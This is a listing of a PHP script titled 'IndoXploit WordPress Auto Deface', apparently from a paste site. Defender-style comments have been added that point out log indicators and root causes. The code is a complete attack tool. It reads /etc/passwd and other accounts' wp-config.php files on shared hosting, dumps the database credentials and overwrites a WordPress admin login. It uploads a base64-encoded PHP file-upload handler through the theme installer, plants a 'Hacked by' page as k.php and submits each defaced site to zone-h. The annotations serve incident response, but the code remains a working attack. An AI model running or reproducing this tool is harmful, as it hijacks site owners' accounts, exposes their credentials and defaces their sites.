jackwilder

IndoXploit WordPress Auto Deface + Zone-H Submit

Jan 29th, 2016
  1. <?php
  2. //how to use : https://www.youtube.com/watch?v=q72Rp8QM4xI
  3. //Tu5b0l3d
  4. //IndoXploit
  5. //http://indoxploit.blogspot.com/ - linuxsec.org
  6. error_reporting(0); // silences PHP error reporting for the whole run
      // Operator-chosen values. Defender note: the login/password pair below is what the
      // script later writes into the WordPress users table, and the HTML string is the page
      // it plants, so all of them are usable search strings during incident response.
  7. $zh = "LooptheLoop"; // zone-h nick
  8. $jembut = "jack"; // add username wordpress
  9. $jembut2 = "linuxsec"; // add password wordpress
  10. $kontol = "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked by LinuxSec<p style='color: transparent'><title>Hacked by Nabilaholic404</title>"; // script deface
  11.  
  12. ######################################################################
  13. // the script below does not need to be modified
  14. // never rename the files ( k.php ) and ( m.php ), or the auto deface will not run
      // Banner output for the operator's browser; cover() also links to the result log indo.htm.
  15. echo "<body bgcolor=black>";
  16. echo "<font color=green>";
  17. echo "<title>IndoXploit WordPress Auto Deface</title>";
  18. cover("IndoXploit");
  19.  
  20. function save($data){
              // Appends $data to "indo.htm" in the current working directory and aborts the
              // whole script with "cant open file" if the file cannot be opened.
              // Defender note: the main loop passes the URL of each defaced site here, so an
              // indo.htm found next to this script is a list of affected sites.
  21.         $fp = @fopen("indo.htm", "a") or die("cant open file");
  22.         fwrite($fp, $data);
  23.         fclose($fp);
  24. }
  25.  
  26. function anucurl($sites){
              // Fetches the URL in $sites with cURL and returns the response body
              // (whatever curl_exec returns). Not called anywhere in the visible listing.
  27.         $ch1 = curl_init ("$sites");
  28. curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
  29. curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
      // Fixed browser-like User-Agent; the same string is reused by every request in this file,
      // which makes it a log-search indicator.
  30. curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  31. curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
      // TLS certificate and host-name verification are both switched off.
  32. curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
  33. curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
      // Cookies are read from and written to a file named "coker_log" in the working directory.
  34. curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
  35. curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
  36. $data = curl_exec ($ch1);
  37. return $data;
  38.     }
  39.  
  40. function lohgin($cek, $web, $userr, $pass){
              // POSTs a WordPress login form to the URL in $cek and returns the response body.
              //   $cek   - URL the form is posted to
              //   $web   - site base URL, used only to build redirect_to
              //   $userr - value sent as "log" (user name)
              //   $pass  - value sent as "pwd" (password)
              // Defender note: in web logs this shows up as a POST carrying the fixed
              // User-Agent below; the session cookies land in the "coker_log" file.
  41.         $post = array(
  42.                     "log" => "$userr",
  43.                     "pwd" => "$pass",
  44.                     "rememberme" => "forever",
  45.                     "wp-submit" => "Log In",
  46.                     "redirect_to" => "$web/wp-admin/",
  47.                     "testcookie" => "1",
  48.                     );
  49. $ch = curl_init ("$cek");
  50. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  51. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  52. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
      // TLS certificate and host-name verification are both switched off.
  53. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  54. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  55. curl_setopt ($ch, CURLOPT_POST, 1);
  56. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  57. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  58. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  59. $data6 = curl_exec ($ch);
  60. return $data6;
  61.     }
  62.  
  63. function cover($indoXploit){
          // Prints the tool banner, with $indoXploit interpolated as the author name, and a
          // link to the result log indo.htm. Output only; returns nothing.
  64.     echo "<center><font size='5px'> WordPress Auto Deface Coded by $indoXploit</font><br>";
  65.     echo "Deface Result : <a href='indo.htm' style='text-decoration: none'>indo.htm</a></center><br><br><br>";
  66. }
  67.  
  68. function ambilKata($param, $kata1, $kata2){
          // Returns the part of $param that lies between the first occurrence of $kata1 and
          // the next occurrence of $kata2 after it; returns FALSE when either marker is absent
          // from $param. The main loop calls it as "ambilkata" (PHP function names are
          // case-insensitive) to pull values out of wp-config.php text and HTML responses.
  69.     if(strpos($param, $kata1) === FALSE) return FALSE;
  70.     if(strpos($param, $kata2) === FALSE) return FALSE;
  71.     $start = strpos($param, $kata1) + strlen($kata1);
  72.     $end = strpos($param, $kata2, $start);
  73.     $return = substr($param, $start, $end - $start);
  74.     return $return;
  75. }
  76.  
  77.  
  78. $a = file_get_contents('/etc/passwd'); // local account list of the host the script runs on
      // Main loop, annotated for defenders. For every account name found in /etc/passwd the
      // script tries to read that account's /home/<user>/public_html/wp-config.php. This only
      // succeeds when the PHP process can read other accounts' files, so the root cause is
      // missing isolation on shared hosting: wp-config.php should not be readable by other
      // hosting accounts (restrictive file mode and ownership, per-account PHP isolation such
      // as open_basedir).
      // Artefacts created in the script's own directory: <user>-config.txt (copied
      // configuration with database credentials), m.php, wew.php, coker_log and indo.htm.
  79.     preg_match_all('/(.*?):x:/', $a, $data);
  80.     foreach($data[1] as $user){
  81. $baca = file_get_contents("/home/$user/public_html/wp-config.php");
  82.  
  83.  /* symlink('/home/'.$user.'/public_html/wp-config.php',$user.'- config.txt');  */
  84.  
  85. if($baca!=""){
  86.    
  87.  
  88. /* $b = `cp /home/$user/public_html/index.php $user-index.txt`; */
  89.  
      // The victim configuration is written to <user>-config.txt and read back from there.
  90. $file1 = "$user-config.txt";
  91. $fp2 = fopen($file1,"w");
  92. fputs($fp2,$baca);
  93.  
  94. $file = @file_get_contents($file1);
  95.  
  96.  
  97. echo $user."-> sukses<br>";
      // Database host, user, password, name and table prefix are cut out of the config text.
  98.                     $host = ambilkata($file,"DB_HOST', '","'");
  99.                     $username = ambilkata($file,"DB_USER', '","'");
  100.                     $password = ambilkata($file,"DB_PASSWORD', '","'");
  101.                     $db = ambilkata($file,"DB_NAME', '","'");
  102.                     $dbprefix = ambilkata($file,"table_prefix  = '","'");
  103.                     $user_baru = $jembut;
  104.                     $password_baru = $jembut2;
  105.                     $prefix = $db.".".$dbprefix."users";
  106.                     $sue = $db.".".$dbprefix."options";
  107.                     $pass = md5("$password_baru");
  108.                     $nick = $kontol;
  109.  
      // The recovered credentials are echoed to the operator's browser in clear text.
  110. echo "# Db Host: $host<br>";
  111. echo "# Db user: $username<br>";
  112. echo "# Db Password: $password<br>";
  113. echo "# Db name: $db<br>";
  114. echo "# Table_Prefix: $dbprefix<br>";
  115.  
  116. mysql_connect($host,$username,$password);
  117.  
  118.         mysql_select_db($db);
  119.  
      // First row of the users table ordered by ID, i.e. the lowest-ID account.
  120.         $tampil=mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  121.         $r=mysql_fetch_array($tampil);
  122.         $id = $r[ID];
  123.  
      // First row of the options table ordered by option_id; its value is used as the site
      // base URL below (presumably the siteurl option; verify against the schema).
  124.         $tampil2=mysql_query("SELECT * FROM $sue ORDER BY option_id ASC");
  125.         $r2=mysql_fetch_array($tampil2);
  126.         $target = $r2[option_value];
  127.          echo "# $target<br>";
  128.        
  129.  
      // Detection point: user_login and user_pass of that account are overwritten with the
      // configured name and the MD5 of the configured password. An unexpected change of the
      // login name or hash on the first account is a strong compromise indicator.
  130.          mysql_query("UPDATE $prefix SET user_pass='$pass',user_login='$user_baru' WHERE ID='$id'");
  131.  
      // Logs in with the replaced credentials, then requests the theme upload page to obtain
      // its _wpnonce value.
  132. $site= "$target/wp-login.php";
  133. $site2= "$target/wp-admin/theme-install.php?upload";
  134. $a = lohgin($site, $target, $user_baru, $password_baru);
  135. $b = lohgin($site2, $target, $user_baru, $password_baru);
  136.            
  137.  
  138. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  139. echo "# token -> $anu2<br>";
  140.  
  141.  
      // NOTE(review): Base64 blob; it appears to decode to a short PHP upload handler that
      // saves a posted file as k.php several directories above its own location. Decode it
      // offline to confirm before relying on this description.
  142. $upload3 = base64_decode("PD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  143.  
  144. $www = "m.php";
  145. $fp5 = fopen($www,"w");
  146. fputs($fp5,$upload3);
  147.  
  148. $c = file_get_contents($w);
  149.    
      // The decoded file is submitted through the theme upload form as "themezip".
      // Detection point: POST to /wp-admin/update.php?action=upload-theme followed by a
      // .php file appearing under wp-content/uploads/<year>/<month>/.
  150.   $post2 = array(
  151.                     "_wpnonce" => "$anu2",
  152.                     "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  153.                     "themezip" => "@m.php",
  154.                     "install-theme-submit" => "Install Now",
  155.                     );
  156. $ch = curl_init ("$target/wp-admin/update.php?action=upload-theme");
  157. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  158. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  159. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  160. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  161. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  162. curl_setopt ($ch, CURLOPT_POST, 1);
  163. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post2);
  164. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  165. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  166. $data3 = curl_exec ($ch);
  167.  
      // The configured defacement HTML is written to wew.php in the script's directory.
  168. $namafile = "wew.php";
  169. $fp2 = fopen($namafile,"w");
  170. fputs($fp2,$nick);
  171.  
  172. $y = date("Y");
  173. $m = date("m");
  174.  
  175.  
      // wew.php is then POSTed as form field "file3" to the m.php path under the current
      // year/month uploads directory of the target site.
  176. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/m.php");
  177. curl_setopt($ch6, CURLOPT_POST, true);
  178. curl_setopt($ch6, CURLOPT_POSTFIELDS,
  179. array('file3'=>"@$namafile"));
  180. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  181. curl_setopt($ch6, CURLOPT_COOKIEFILE, "coker_log");
  182. $postResult = curl_exec($ch6);
  183. curl_close($ch6);
  184.  
      // Success test: <site>/k.php is fetched and searched, case-insensitively, for "hacked".
      // A k.php in a site's document root is therefore the primary on-disk indicator.
  185. $as = "$target/k.php";
  186. $bs = file_get_contents($as);
  187.  if(preg_match("#hacked#si",$bs)){
  188.                         echo "[+] <font color='cyan'>Deface success..<br>";
  189.                         echo "[+] $as<br>";
  190.                         save($as."<br>");
  191.                         echo "[+] zone-h: ";
      // The defaced URL is reported to zone-h under the configured nick; an outbound POST to
      // www.zone-h.com/notify/single from a web server is visible in egress or proxy logs.
  192.                         $ch3 = curl_init ("http://www.zone-h.com/notify/single");
  193.                         curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
  194.                         curl_setopt ($ch3, CURLOPT_POST, 1);
  195.                         curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=$zh&domain1=$as&hackmode=1&reason=1");
  196.                        
  197.         if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch3))){
  198.                 echo  " Ok  <br><br>";
  199.         }else{
  200.                 echo " No <br><br></font>";}
  201.                     }
  202.                     else{
      // Even on this branch the account overwrite above has already happened, so the site
      // still needs a credential reset and a review of its administrator accounts.
  203.                         echo "[!] <font color='red'>Deface Failed..<br>";
  204.                         echo "[!] Try manual deface at : <br>";
  205.                         echo "[!] $target/wp-login.php<br>";
  206.                         echo "[!] username: $user_baru<br>";
  207.                         echo "[!] password: $password_baru<br><br><br></font>";
  208.  
  209.                        
  210.                     }
  211.     }
  212. else{
      // wp-config.php for this account was missing, empty or not readable.
  213.     echo "$user <= No<br>";
  214. }
  215.  
  216.  
  217.  
  218. }
  219.  
  220.  
  221. ?>